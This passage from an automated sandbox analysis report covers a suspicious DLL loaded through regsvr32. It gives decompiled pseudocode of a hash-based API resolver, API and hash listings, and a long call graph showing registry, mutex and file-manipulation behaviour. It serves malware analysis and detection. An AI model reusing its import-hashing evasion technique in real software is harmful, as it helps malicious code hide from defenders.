                  • Opcode Fuzzy Hash: 7d4547abbc7cd73308a72d50dfc35b1c5cccec9524bb0b2978a9a99cc3da80e6
                  • Instruction Fuzzy Hash: 50319C756083A19FF744DF64CCD886E77A9EB983D0B418968F601872A6DB30EC44CB52
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • GetWindowsDirectoryW.KERNEL32 ref: 10029B87
                  • FindFirstChangeNotificationW.KERNEL32(10114AA8,00000000,00000020), ref: 10029BD2
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.497767833.0000000010021000.00000020.00020000.sdmp, Offset: 10021000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_10021000_regsvr32.jbxd
                  Similarity
                  • API ID: ChangeDirectoryFindFirstNotificationWindows
                  • String ID: 1
                  • API String ID: 3662519435-2212294583
                  • Opcode ID: 0b9660a65e4cab3b7e7ad5c03af4bb0263a6bc0f85f4f16362e04827d69aa07f
                  • Instruction ID: a17468885719ca7b42c6c3de4681764e2a8d7b2457ed512f777c56a051c8a142
                  • Opcode Fuzzy Hash: 0b9660a65e4cab3b7e7ad5c03af4bb0263a6bc0f85f4f16362e04827d69aa07f
                  • Instruction Fuzzy Hash: 3851CF72A043A08FE335CF28CCC85D677E1EB88302F21472ED58597295D6BAAC85CB81
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E1000DFAD(void* __ecx, intOrPtr __edx) {
                  				signed int _v8;
                  				intOrPtr _v12;
                  				intOrPtr _v16;
                  				intOrPtr _v20;
                  				intOrPtr _v24;
                  				intOrPtr _v28;
                  				char _v92;
                  				intOrPtr _t41;
                  				signed int _t47;
                  				signed int _t49;
                  				signed int _t51;
                  				void* _t56;
                  				struct HINSTANCE__* _t58;
                  				_Unknown_base(*)()* _t59;
                  				intOrPtr _t60;
                  				void* _t62;
                  				intOrPtr _t63;
                  				void* _t69;
                  				char _t70;
                  				void* _t75;
                  				CHAR* _t80;
                  				void* _t82;
                  
                  				_t75 = __ecx;
                  				_v12 = __edx;
                  				_t60 =  *((intOrPtr*)(__ecx + 0x3c));
                  				_t41 =  *((intOrPtr*)(_t60 + __ecx + 0x78));
                  				if(_t41 == 0) {
                  					L4:
                  					return 0;
                  				}
                  				_t62 = _t41 + __ecx;
                  				_v24 =  *((intOrPtr*)(_t62 + 0x24)) + __ecx;
                  				_t73 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
                  				_t63 =  *((intOrPtr*)(_t62 + 0x18));
                  				_v28 =  *((intOrPtr*)(_t62 + 0x1c)) + __ecx;
                  				_t47 = 0;
                  				_v20 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
                  				_v8 = 0;
                  				_v16 = _t63;
                  				if(_t63 == 0) {
                  					goto L4;
                  				} else {
                  					goto L2;
                  				}
                  				while(1) {
                  					L2:
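                  					// Each export name is hashed by E1000D400; the result XORed with 0x218fe95b
                  					// is compared with the value passed in __edx (lookup by hash, not by name string).
                  					_t49 = E1000D400( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75, E1000C379( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75), 0);
                  					_t51 = _v8;
                  					if((_t49 ^ 0x218fe95b) == _v12) {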
                  						break;
                  					}
                  					_t73 = _v20;
                  					_t47 = _t51 + 1;
                  					_v8 = _t47;
                  					if(_t47 < _v16) {
                  						continue;
                  					}
                  					goto L4;
                  				}
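                  				// Name index -> ordinal -> function address. An address that falls inside the
                  				// export directory (RVA at +0x78, size at +0x7c) is a forwarder string
                  				// ("MODULE.Function"), not code; any other address is returned as-is.
                  				_t69 =  *((intOrPtr*)(_t60 + _t75 + 0x78)) + _t75;
                  				_t80 =  *((intOrPtr*)(_v28 + ( *(_v24 + _t51 * 2) & 0x0000ffff) * 4)) + _t75;
                  				if(_t80 < _t69 || _t80 >=  *((intOrPtr*)(_t60 + _t75 + 0x7c)) + _t69) {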
                  					return _t80;
                  				} else {
                  					_t56 = 0;
                  					while(1) {
                  						_t70 = _t80[_t56];
                  						if(_t70 == 0x2e || _t70 == 0) {
                  							break;
                  						}
                  						 *((char*)(_t82 + _t56 - 0x58)) = _t70;
                  						_t56 = _t56 + 1;
                  						if(_t56 < 0x40) {
                  							continue;
                  						}
                  						break;
                  					}
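                  					// 0x6c6c642e is ".dll" in little-endian byte order: the module part of the
                  					// forwarder string gets the extension appended before LoadLibraryA is called.
                  					 *((intOrPtr*)(_t82 + _t56 - 0x58)) = 0x6c6c642e;
                  					 *((char*)(_t82 + _t56 - 0x54)) = 0;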
                  					if( *((char*)(_t56 + _t80)) != 0) {
                  						_t80 =  &(( &(_t80[1]))[_t56]);
                  					}
                  					_t40 =  &_v92; // 0x6c6c642e
                  					_t58 = LoadLibraryA(_t40);
                  					if(_t58 == 0) {
                  						goto L4;
                  					}
                  					_t59 = GetProcAddress(_t58, _t80);
                  					if(_t59 == 0) {
                  						goto L4;
                  					}
                  					return _t59;
                  				}
                  			}

                  APIs
                  • LoadLibraryA.KERNEL32(.dll), ref: 1000E07D
                  • GetProcAddress.KERNEL32(00000000,8DF08B59), ref: 1000E089
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.497736251.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000005.00000002.497731437.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000005.00000002.497749205.0000000010018000.00000002.00020000.sdmp
                  • Associated: 00000005.00000002.497757016.000000001001D000.00000004.00020000.sdmp
                  • Associated: 00000005.00000002.497762389.000000001001F000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd
                  Similarity
                  • API ID: AddressLibraryLoadProc
                  • String ID: .dll
                  • API String ID: 2574300362-2738580789
                  • Opcode ID: b7447c8816937ad7f9345e32d2240df4bb2b7db976f4be3fc21d842f10db7ef4
                  • Instruction ID: 6da95daea6e89431fe10e6910c52a9851ea62cfcad36df982cd2ab94b172e300
                  • Opcode Fuzzy Hash: b7447c8816937ad7f9345e32d2240df4bb2b7db976f4be3fc21d842f10db7ef4
                  • Instruction Fuzzy Hash: F631E431A002998BEB54CFA9C8847AEBBF5EF44384F24446DD905E7349D770ED81C7A0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Execution Graph

                  Execution Coverage:14.2%
                  Dynamic/Decrypted Code Coverage:0%
                  Signature Coverage:0.6%
                  Total number of Nodes:2000
                  Total number of Limit Nodes:41

                  Graph

13282->13283 13283->13284 13284->13261 13285->13268 13286->13272 13366 85431 13367 8950e 3 API calls 13366->13367 13368 85449 13367->13368 13388 85531 13368->13388 13389 88604 RtlAllocateHeap 13368->13389 13370 85460 13371 895c7 RtlAllocateHeap 13370->13371 13370->13388 13372 85478 13371->13372 13373 89601 2 API calls 13372->13373 13374 8548d 13373->13374 13375 885c2 2 API calls 13374->13375 13376 85495 13375->13376 13377 8a77d 3 API calls 13376->13377 13378 854a3 13377->13378 13379 8861a 2 API calls 13378->13379 13380 854b0 13379->13380 13381 8a911 4 API calls 13380->13381 13385 854bd 13381->13385 13382 8b1b1 13 API calls 13387 854e8 13382->13387 13384 85526 13386 8861a 2 API calls 13384->13386 13385->13387 13390 8a63b CreateFileW 13385->13390 13386->13388 13387->13382 13387->13384 13389->13370 13390->13385 13525 82454 13526 8246a 13525->13526 13535 82509 13525->13535 13527 8b4a3 2 API calls 13526->13527 13529 82477 13527->13529 13528 894b7 2 API calls 13530 82516 13528->13530 13547 89569 13529->13547 13533 89256 2 API calls 13534 82485 13533->13534 13534->13535 13536 8109a RtlAllocateHeap 13534->13536 13535->13528 13537 82498 13536->13537 13538 892e5 2 API calls 13537->13538 13539 824b0 13538->13539 13540 885d5 2 API calls 13539->13540 13541 824be 13540->13541 13542 824fa 13541->13542 13544 8a911 4 API calls 13541->13544 13543 8861a 2 API calls 13542->13543 13543->13535 13545 824dd 13544->13545 13546 8861a 2 API calls 13545->13546 13546->13542 13548 89572 13547->13548 13550 8247e 13547->13550 13551 88604 RtlAllocateHeap 13548->13551 13550->13533 13551->13550 9948 85cec 9965 9249b 9948->9965 9952 85d08 9971 88f78 9952->9971 9964 85d6c 9966 924b3 GetModuleHandleA 9965->9966 9968 85d03 9965->9968 9969 924ce 9966->9969 9967 92547 LoadLibraryA 9967->9968 9967->9969 9970 885ef HeapCreate 9968->9970 9969->9967 9969->9968 9970->9952 10032 88604 RtlAllocateHeap 9971->10032 9973 85d0d 9974 85eb6 9973->9974 10033 8e1bc 9974->10033 9977 8e1bc 7 API calls 9978 85ee3 
9977->9978 9979 8e1bc 7 API calls 9978->9979 9980 85efc 9979->9980 9981 8e1bc 7 API calls 9980->9981 9982 85f15 9981->9982 9983 8e1bc 7 API calls 9982->9983 9984 85f30 9983->9984 9985 8e1bc 7 API calls 9984->9985 9986 85f49 9985->9986 9987 8e1bc 7 API calls 9986->9987 9988 85f62 9987->9988 9989 8e1bc 7 API calls 9988->9989 9990 85d26 9989->9990 9991 8cf84 GetCurrentProcess 9990->9991 10075 8ba05 9991->10075 9993 8cf9d GetModuleFileNameW 9994 8cfbb 9993->9994 9995 8cfd3 memset GetVersionExA GetCurrentProcessId 9994->9995 10082 8e3b6 9995->10082 9997 8d004 10087 8e3f1 9997->10087 10000 8a86d 10001 8a886 10000->10001 10106 8a7bc 10001->10106 10004 8b337 10006 8b34a 10004->10006 10005 85d58 memset 10008 85c26 10005->10008 10006->10005 10007 8b363 CloseHandle 10006->10007 10007->10005 10126 89b43 10008->10126 10011 85c51 10011->9964 10012 85c69 10178 85d7d 10012->10178 10016 85c78 10018 85c7d 10016->10018 10019 85ccc 10016->10019 10017 85cc7 10211 85aff 10017->10211 10022 85ce8 10018->10022 10025 8a86d 5 API calls 10018->10025 10021 85cc5 10019->10021 10019->10022 10224 8f8cc 10019->10224 10245 85a61 RtlAddVectoredExceptionHandler 10021->10245 10022->9964 10026 85c9d 10025->10026 10027 8b337 CloseHandle 10026->10027 10028 85ca5 10027->10028 10187 85974 10028->10187 10032->9973 10043 895c7 10033->10043 10036 8e1de GetModuleHandleA 10038 8e1ed 10036->10038 10037 8e1e6 LoadLibraryA 10037->10038 10039 8e1fb 10038->10039 10046 8e171 10038->10046 10051 885c2 10039->10051 10055 884ab 10043->10055 10060 88604 RtlAllocateHeap 10046->10060 10048 8e1b2 10048->10039 10049 8e183 10049->10048 10061 8dfad 10049->10061 10052 885ca 10051->10052 10053 85eca 10051->10053 10067 8861a 10052->10067 10053->9977 10056 884c1 10055->10056 10058 884e2 10055->10058 10056->10058 10059 88604 RtlAllocateHeap 10056->10059 10058->10036 10058->10037 10059->10058 10060->10049 10062 8e021 10061->10062 10063 8dfc6 10061->10063 10062->10049 10063->10062 10064 8e079 LoadLibraryA 10063->10064 10064->10062 
10065 8e087 GetProcAddress 10064->10065 10065->10062 10066 8e093 10065->10066 10066->10062 10068 88666 10067->10068 10069 88624 10067->10069 10068->10053 10069->10068 10072 8874f 10069->10072 10073 88758 memset 10072->10073 10074 88654 HeapFree 10072->10074 10073->10074 10074->10068 10077 8ba1d 10075->10077 10076 8ba21 10076->9993 10077->10076 10091 8b998 GetTokenInformation 10077->10091 10080 8ba3e 10080->9993 10081 8ba52 CloseHandle 10081->10080 10083 8e3cd 10082->10083 10084 8e3ed 10083->10084 10101 891e3 10083->10101 10084->9997 10086 8e3da 10086->9997 10089 8e410 10087->10089 10088 85d2b 10088->10000 10089->10088 10090 891e3 RtlAllocateHeap 10089->10090 10090->10088 10092 8b9ba GetLastError 10091->10092 10093 8b9d7 10091->10093 10092->10093 10094 8b9c5 10092->10094 10093->10080 10093->10081 10100 88604 RtlAllocateHeap 10094->10100 10096 8b9cd 10096->10093 10097 8b9db GetTokenInformation 10096->10097 10097->10093 10098 8b9f0 10097->10098 10099 8861a 2 API calls 10098->10099 10099->10093 10100->10096 10102 891ec 10101->10102 10104 891fe 10101->10104 10105 88604 RtlAllocateHeap 10102->10105 10104->10086 10105->10104 10115 922d3 10106->10115 10108 8a7d4 10109 895c7 RtlAllocateHeap 10108->10109 10110 8a7fe 10109->10110 10119 89601 10110->10119 10112 8a85c 10113 885c2 2 API calls 10112->10113 10114 85d50 10113->10114 10114->10004 10117 922de 10115->10117 10118 922fd 10115->10118 10117->10118 10123 9242d 10117->10123 10118->10108 10120 8874f memset 10119->10120 10121 89615 _vsnprintf 10120->10121 10122 8962f 10121->10122 10122->10112 10124 9243c 10123->10124 10125 92480 _ftol2_sse 10124->10125 10125->10117 10248 88604 RtlAllocateHeap 10126->10248 10128 89b6d 10129 85c45 10128->10129 10249 8b5f6 10128->10249 10129->10011 10129->10012 10167 8fb19 10129->10167 10132 895c7 RtlAllocateHeap 10133 89bb0 10132->10133 10134 89ceb 10133->10134 10138 89bdc 10133->10138 10135 89d3c 10134->10135 10136 89cfd 10134->10136 10137 89292 2 API calls 10135->10137 10140 89292 2 API calls 
10136->10140 10162 89ce7 10136->10162 10137->10162 10138->10162 10259 89292 10138->10259 10139 885c2 2 API calls 10141 89d5c RegOpenKeyExA 10139->10141 10140->10162 10142 89d76 RegCreateKeyA 10141->10142 10151 89db2 10141->10151 10144 89d8d 10142->10144 10142->10151 10145 8861a 2 API calls 10144->10145 10146 89d9b memset 10145->10146 10147 8861a 2 API calls 10146->10147 10147->10151 10149 89ca1 10155 89292 2 API calls 10149->10155 10153 8861a 2 API calls 10151->10153 10153->10129 10156 89cc8 10155->10156 10161 8861a 2 API calls 10156->10161 10161->10162 10162->10139 10164 8861a 2 API calls 10165 89c96 10164->10165 10166 8861a 2 API calls 10165->10166 10166->10149 10292 88604 RtlAllocateHeap 10167->10292 10169 8fb20 10170 8fb2a 10169->10170 10293 8a6a9 10169->10293 10170->10012 10173 8fb6e 10173->10012 10175 8fb55 10176 8f8cc 26 API calls 10175->10176 10177 8fb6b 10176->10177 10177->10012 10179 8a86d 5 API calls 10178->10179 10180 85d9a 10179->10180 10181 85c6e 10180->10181 10182 85974 9 API calls 10180->10182 10181->10016 10181->10017 10183 85dd4 10182->10183 10183->10181 10349 89ebb 10183->10349 10186 85de6 lstrcmpiW 10186->10181 10188 8a86d 5 API calls 10187->10188 10189 8598d 10188->10189 10190 8599a 10189->10190 10191 89292 2 API calls 10189->10191 10192 859bd 10191->10192 10382 8590c 10192->10382 10194 8861a 2 API calls 10195 859fd 10194->10195 10199 85bc4 10195->10199 10196 859cd 10197 8590c 3 API calls 10196->10197 10198 859f1 10196->10198 10197->10198 10198->10194 10200 89ebb 7 API calls 10199->10200 10201 85bce 10200->10201 10202 85bdc lstrcmpiW 10201->10202 10203 85bd7 10201->10203 10204 85bf2 10202->10204 10205 85c14 10202->10205 10203->10021 10387 89f6c 10204->10387 10207 8861a 2 API calls 10205->10207 10207->10203 10209 85c0d 10391 8b1b1 SetFileAttributesW memset 10209->10391 10438 88604 RtlAllocateHeap 10211->10438 10213 85b11 10214 85b24 GetDriveTypeW 10213->10214 10215 85b55 10213->10215 10214->10215 10439 85a7b 10215->10439 10217 85b71 10218 85ba1 
10217->10218 10456 84d6d 10217->10456 10547 8a39e 10218->10547 10222 8a39e 2 API calls 10223 85bbd 10222->10223 10223->10019 10225 8109a RtlAllocateHeap 10224->10225 10226 8f8db 10225->10226 11115 861b4 memset 10226->11115 10229 885d5 2 API calls 10230 8f901 10229->10230 10244 8f978 10230->10244 11132 89e66 10230->11132 10234 8f92c 10235 8109a RtlAllocateHeap 10234->10235 10234->10244 10236 8f93e 10235->10236 10237 89640 2 API calls 10236->10237 10238 8f94d 10237->10238 10239 8a911 4 API calls 10238->10239 10240 8f95e 10239->10240 10241 8f96c 10240->10241 11138 8a239 10240->11138 10243 8861a 2 API calls 10241->10243 10243->10244 10244->10021 11146 85631 10245->11146 10248->10128 10250 8b60f 10249->10250 10251 9242d _ftol2_sse 10250->10251 10252 8b61f 10251->10252 10253 895c7 RtlAllocateHeap 10252->10253 10255 8b62e 10253->10255 10254 8b66a 10256 885c2 2 API calls 10254->10256 10255->10254 10257 9242d _ftol2_sse 10255->10257 10258 89b91 10256->10258 10257->10255 10258->10132 10260 892a4 10259->10260 10284 88604 RtlAllocateHeap 10260->10284 10262 892c1 10263 892de 10262->10263 10264 892cd lstrcatA 10262->10264 10263->10144 10263->10149 10265 895e1 10263->10265 10264->10262 10285 88531 10265->10285 10267 895fc 10268 892e5 10267->10268 10270 892f7 10268->10270 10290 88604 RtlAllocateHeap 10270->10290 10271 89316 10272 89333 10271->10272 10273 89322 lstrcatW 10271->10273 10274 885d5 10272->10274 10273->10271 10275 885eb 10274->10275 10276 885e3 10274->10276 10278 89256 10275->10278 10277 8861a 2 API calls 10276->10277 10277->10275 10279 8925f 10278->10279 10280 8928c 10278->10280 10291 88604 RtlAllocateHeap 10279->10291 10280->10164 10282 89271 10282->10280 10283 89279 MultiByteToWideChar 10282->10283 10283->10280 10284->10262 10287 8854d 10285->10287 10289 88604 RtlAllocateHeap 10287->10289 10288 88581 10288->10267 10288->10288 10289->10288 10290->10271 10291->10282 10292->10169 10294 8a6bb 10293->10294 10295 8a6c2 10293->10295 10294->10173 10306 8f9bf 10294->10306 
10330 8a63b CreateFileW 10295->10330 10297 8a6c9 10297->10294 10299 8a73d 10297->10299 10331 88604 RtlAllocateHeap 10297->10331 10299->10294 10300 8861a 2 API calls 10299->10300 10300->10294 10301 8a72d ReadFile 10301->10299 10302 8a6f0 10301->10302 10302->10299 10302->10301 10303 8a75e 10302->10303 10303->10299 10304 8a763 CloseHandle 10303->10304 10304->10294 10332 88604 RtlAllocateHeap 10306->10332 10308 8f9d2 10310 8fabc 10308->10310 10317 8fb10 10308->10317 10333 8109a 10308->10333 10312 8fae5 Sleep 10310->10312 10313 8fb06 10310->10313 10336 8a77d 10310->10336 10312->10310 10312->10313 10315 8861a 2 API calls 10313->10315 10315->10317 10316 895e1 RtlAllocateHeap 10318 8fa2c 10316->10318 10317->10175 10319 892e5 2 API calls 10318->10319 10320 8fa49 10319->10320 10321 8a6a9 6 API calls 10320->10321 10322 8fa56 10321->10322 10323 885d5 2 API calls 10322->10323 10324 8fa62 10323->10324 10325 885d5 2 API calls 10324->10325 10327 8fa6b 10325->10327 10326 8861a 2 API calls 10328 8fab1 10326->10328 10327->10326 10329 8861a 2 API calls 10328->10329 10329->10310 10330->10297 10331->10302 10332->10308 10334 88531 RtlAllocateHeap 10333->10334 10335 810b5 10334->10335 10335->10316 10343 8a5f7 CreateFileW 10336->10343 10339 8a792 10339->10310 10342 8a7ae CloseHandle 10342->10339 10344 8a61c 10343->10344 10344->10339 10345 8a65c 10344->10345 10346 8a69e 10345->10346 10347 8a66f WriteFile 10345->10347 10346->10339 10346->10342 10347->10346 10348 8a693 10347->10348 10348->10346 10348->10347 10352 89f95 10349->10352 10353 89fbe 10352->10353 10364 89b0e 10353->10364 10355 89fc9 10358 85de2 10355->10358 10367 8be9b RegOpenKeyExA 10355->10367 10357 8861a 2 API calls 10357->10358 10358->10181 10358->10186 10359 8a070 10361 8861a 2 API calls 10359->10361 10360 89ffd 10360->10359 10363 8a095 10360->10363 10376 88669 10360->10376 10361->10363 10363->10357 10379 88604 RtlAllocateHeap 10364->10379 10366 89b1a 10366->10355 10366->10366 10368 8bec9 RegQueryValueExA 10367->10368 10371 
8bec5 10367->10371 10369 8bee8 10368->10369 10375 8bf15 10368->10375 10380 88604 RtlAllocateHeap 10369->10380 10371->10360 10372 8bf26 RegCloseKey 10372->10371 10373 8bef2 10374 8bef9 RegQueryValueExA 10373->10374 10373->10375 10374->10375 10375->10371 10375->10372 10381 88604 RtlAllocateHeap 10376->10381 10378 8867a 10378->10359 10379->10366 10380->10373 10381->10378 10383 8591c CreateMutexA 10382->10383 10386 85917 10382->10386 10384 8593f GetLastError 10383->10384 10385 85934 GetLastError 10383->10385 10384->10386 10385->10386 10386->10196 10388 89f7c 10387->10388 10404 8a0ab 10388->10404 10392 8a77d 3 API calls 10391->10392 10393 8b1ec 10392->10393 10394 8b1ff 10393->10394 10395 9242d _ftol2_sse 10393->10395 10394->10205 10396 8b21b 10395->10396 10422 89640 10396->10422 10399 892e5 2 API calls 10400 8b23d 10399->10400 10400->10394 10426 8b0de 10400->10426 10403 8861a 2 API calls 10403->10394 10405 85c08 10404->10405 10406 8a0c8 10404->10406 10405->10205 10405->10209 10406->10405 10407 9242d _ftol2_sse 10406->10407 10408 8a112 10407->10408 10421 88604 RtlAllocateHeap 10408->10421 10410 8a126 10410->10405 10411 922d3 _ftol2_sse 10410->10411 10412 8a168 10411->10412 10413 89b0e RtlAllocateHeap 10412->10413 10414 8a1b4 10413->10414 10416 8a1c8 RegOpenKeyExA 10414->10416 10420 8a21e 10414->10420 10415 8861a 2 API calls 10415->10405 10417 8a1ea RegSetValueExA 10416->10417 10418 8a1e5 10416->10418 10417->10418 10419 8861a 2 API calls 10418->10419 10419->10420 10420->10415 10421->10410 10423 8874f memset 10422->10423 10424 89654 _vsnwprintf 10423->10424 10425 89671 10424->10425 10425->10399 10427 8b101 10426->10427 10428 8b109 memset 10427->10428 10437 8b178 10427->10437 10429 895e1 RtlAllocateHeap 10428->10429 10430 8b125 10429->10430 10431 9242d _ftol2_sse 10430->10431 10432 8b141 10431->10432 10433 89640 2 API calls 10432->10433 10434 8b157 10433->10434 10435 885d5 2 API calls 10434->10435 10436 8b160 MoveFileW 10435->10436 10436->10437 10437->10403 10438->10213 
10555 81080 10439->10555 10444 885c2 2 API calls 10445 85ab7 10444->10445 10446 85af7 10445->10446 10447 81080 RtlAllocateHeap 10445->10447 10446->10217 10448 85ac5 10447->10448 10564 88910 10448->10564 10451 85ae1 10453 885c2 2 API calls 10451->10453 10454 85aeb 10453->10454 10455 8861a 2 API calls 10454->10455 10455->10446 10457 84dee 10456->10457 10458 84d91 10456->10458 10664 8b7a8 memset GetComputerNameW lstrcpynW 10457->10664 10460 895c7 RtlAllocateHeap 10458->10460 10462 84d9b 10460->10462 10461 84dfc 10463 8a86d 5 API calls 10461->10463 10464 895c7 RtlAllocateHeap 10462->10464 10465 84e08 10463->10465 10466 84dab 10464->10466 10674 8a471 CreateMutexA 10465->10674 10466->10457 10468 84db9 GetModuleHandleA 10466->10468 10470 84dcd 10468->10470 10471 84dc6 GetModuleHandleA 10468->10471 10469 84e14 10472 84e1d 10469->10472 10473 8e1bc 7 API calls 10469->10473 10475 885c2 2 API calls 10470->10475 10471->10470 10472->10218 10474 84e37 10473->10474 10476 895e1 RtlAllocateHeap 10474->10476 10477 84dde 10475->10477 10478 84e48 10476->10478 10479 885c2 2 API calls 10477->10479 10480 892e5 2 API calls 10478->10480 10481 84de7 10479->10481 10482 84e60 10480->10482 10481->10457 10481->10472 10483 885d5 2 API calls 10482->10483 10484 84e73 10483->10484 10678 8b269 GetFileAttributesW 10484->10678 10486 84e7b 10487 84e9c 10486->10487 10785 8896f 10486->10785 10488 8861a 2 API calls 10487->10488 10490 84ead 10488->10490 10679 84a0b memset 10490->10679 10491 84e8f 10491->10487 10494 8a2e3 8 API calls 10491->10494 10494->10487 10496 895e1 RtlAllocateHeap 10498 851fd 10496->10498 10499 892e5 2 API calls 10498->10499 10500 85215 10499->10500 10501 85245 10500->10501 10806 8b269 GetFileAttributesW 10500->10806 10504 885d5 2 API calls 10501->10504 10502 8e2c6 64 API calls 10506 84f64 10502->10506 10507 85251 lstrcpynW lstrcpynW 10504->10507 10505 85229 10510 8861a 2 API calls 10505->10510 10508 84fb3 10506->10508 10513 85082 10506->10513 10541 851f1 10506->10541 10509 85296 
10507->10509 10515 84fbc 10508->10515 10508->10541 10511 8861a 2 API calls 10509->10511 10510->10501 10512 852a8 10511->10512 10514 8861a 2 API calls 10512->10514 10513->10541 10749 8fc1f 10513->10749 10514->10472 10805 88604 RtlAllocateHeap 10515->10805 10518 85006 10518->10472 10520 895e1 RtlAllocateHeap 10518->10520 10522 8501f 10520->10522 10524 89640 2 API calls 10522->10524 10523 85110 10526 8109a RtlAllocateHeap 10523->10526 10523->10541 10525 85052 10524->10525 10527 885d5 2 API calls 10525->10527 10528 85129 10526->10528 10529 8505c 10527->10529 10762 8902d 10528->10762 10531 8a911 4 API calls 10529->10531 10541->10496 10548 85bb5 10547->10548 10549 8a3ad 10547->10549 10548->10222 10550 8a3d2 10549->10550 10551 8861a 2 API calls 10549->10551 10552 8861a 2 API calls 10550->10552 10551->10549 10553 8a3dd 10552->10553 10554 8861a 2 API calls 10553->10554 10554->10548 10556 884ab RtlAllocateHeap 10555->10556 10557 81096 10556->10557 10558 8a51a 10557->10558 10559 8a538 10558->10559 10560 9242d _ftol2_sse 10559->10560 10561 8a580 10559->10561 10563 85aa7 10559->10563 10560->10559 10562 88669 RtlAllocateHeap 10561->10562 10561->10563 10562->10563 10563->10444 10565 8891f 10564->10565 10571 85ad4 10564->10571 10583 88604 RtlAllocateHeap 10565->10583 10567 88929 10567->10571 10584 88815 10567->10584 10570 8861a 2 API calls 10570->10571 10571->10451 10572 8a2e3 10571->10572 10619 88a90 10572->10619 10576 8a397 10576->10451 10577 8a38f 10634 88cc0 10577->10634 10580 8a2fd 10580->10576 10580->10577 10581 88698 3 API calls 10580->10581 10625 89749 10580->10625 10630 891a6 10580->10630 10581->10580 10583->10567 10594 88604 RtlAllocateHeap 10584->10594 10586 888d6 10588 8861a 2 API calls 10586->10588 10589 88837 10586->10589 10587 8882a 10587->10586 10587->10589 10595 8ebf0 10587->10595 10588->10589 10589->10570 10589->10571 10592 888f0 10593 8861a 2 API calls 10592->10593 10593->10589 10594->10587 10610 88604 RtlAllocateHeap 10595->10610 10597 8ec14 10598 8ed7f 
10597->10598 10611 88604 RtlAllocateHeap 10597->10611 10600 8861a 2 API calls 10598->10600 10602 8eda5 10600->10602 10601 8ec2c 10601->10598 10612 88604 RtlAllocateHeap 10601->10612 10604 8861a 2 API calls 10602->10604 10605 8edb3 10604->10605 10606 888cf 10605->10606 10607 8861a 2 API calls 10605->10607 10606->10586 10606->10592 10607->10606 10608 8ec42 10608->10598 10613 88698 10608->10613 10610->10597 10611->10601 10612->10608 10618 88604 RtlAllocateHeap 10613->10618 10615 886d5 10615->10608 10616 886ad 10616->10615 10617 8861a 2 API calls 10616->10617 10617->10615 10618->10616 10622 88ab3 10619->10622 10620 88604 RtlAllocateHeap 10620->10622 10621 88be7 10624 88604 RtlAllocateHeap 10621->10624 10622->10620 10622->10621 10623 8861a 2 API calls 10622->10623 10623->10622 10624->10580 10626 8974b 10625->10626 10626->10626 10627 8978c SetLastError 10626->10627 10628 89780 SetLastError 10626->10628 10629 89799 10627->10629 10628->10629 10629->10580 10631 891c7 10630->10631 10632 891b1 10630->10632 10631->10580 10646 88604 RtlAllocateHeap 10632->10646 10635 88d57 10634->10635 10637 88ccf 10634->10637 10635->10576 10636 88d09 10638 88d19 10636->10638 10647 88de5 10636->10647 10637->10635 10637->10636 10639 8861a 2 API calls 10637->10639 10641 88d34 10638->10641 10643 8861a 2 API calls 10638->10643 10639->10637 10642 88d4a 10641->10642 10644 8861a 2 API calls 10641->10644 10645 8861a 2 API calls 10642->10645 10643->10641 10644->10642 10645->10635 10646->10631 10658 88604 RtlAllocateHeap 10647->10658 10649 88e1e 10651 88e61 10649->10651 10657 88e28 10649->10657 10659 8879d 10649->10659 10652 8a5f7 CreateFileW 10651->10652 10653 88f39 10652->10653 10654 8a65c WriteFile 10653->10654 10655 88f40 10653->10655 10654->10655 10656 8861a 2 API calls 10655->10656 10656->10657 10657->10638 10658->10649 10660 9242d _ftol2_sse 10659->10660 10663 887b6 10660->10663 10661 887e3 10661->10651 10662 9242d _ftol2_sse 10662->10663 10663->10661 10663->10662 10665 895e1 RtlAllocateHeap 
10664->10665 10666 8b7ff GetVolumeInformationW 10665->10666 10667 885d5 2 API calls 10666->10667 10668 8b834 10667->10668 10669 89640 2 API calls 10668->10669 10670 8b855 lstrcatW 10669->10670 10807 8c392 10670->10807 10673 8b87b 10673->10461 10675 8a48b GetLastError 10674->10675 10676 8a495 GetLastError 10674->10676 10677 8a4a2 10675->10677 10676->10677 10677->10469 10678->10486 10681 84a41 10679->10681 10680 84a76 10682 8b7a8 10 API calls 10680->10682 10686 84ae2 10680->10686 10681->10680 10809 82ba4 10681->10809 10684 84a8d 10682->10684 10825 8b67d 10684->10825 10686->10541 10743 8e2c6 10686->10743 10744 8e2fa 10743->10744 10745 84f40 10744->10745 11017 88604 RtlAllocateHeap 10744->11017 11018 84905 10744->11018 10745->10502 10745->10506 10750 850fa 10749->10750 10751 8fc43 10749->10751 10750->10541 10761 88604 RtlAllocateHeap 10750->10761 10752 88669 RtlAllocateHeap 10751->10752 10753 8fc4d 10752->10753 10753->10750 10754 8fc87 10753->10754 10755 8a77d 3 API calls 10753->10755 10756 860df 4 API calls 10754->10756 10760 8fc8e 10754->10760 10755->10754 10758 8fcac 10756->10758 10757 8861a 2 API calls 10757->10750 10758->10760 11077 8f7e3 10758->11077 10760->10757 10761->10523 10763 8903d 10762->10763 10763->10763 10764 9242d _ftol2_sse 10763->10764 10765 89058 10764->10765 11113 88604 RtlAllocateHeap 10785->11113 10787 88990 10788 889a1 lstrcpynW 10787->10788 10795 8899a 10787->10795 10789 88a14 10788->10789 10790 889c4 10788->10790 11114 88604 RtlAllocateHeap 10789->11114 10792 8a6a9 6 API calls 10790->10792 10794 889d0 10792->10794 10793 88a1f 10793->10795 10796 88a39 10793->10796 10799 8861a 2 API calls 10793->10799 10794->10796 10797 88815 3 API calls 10794->10797 10795->10491 10798 88a61 10796->10798 10802 8861a 2 API calls 10796->10802 10800 889ea 10797->10800 10803 8861a 2 API calls 10798->10803 10799->10796 10800->10793 10801 889f0 10800->10801 10804 8861a 2 API calls 10801->10804 10802->10798 10803->10795 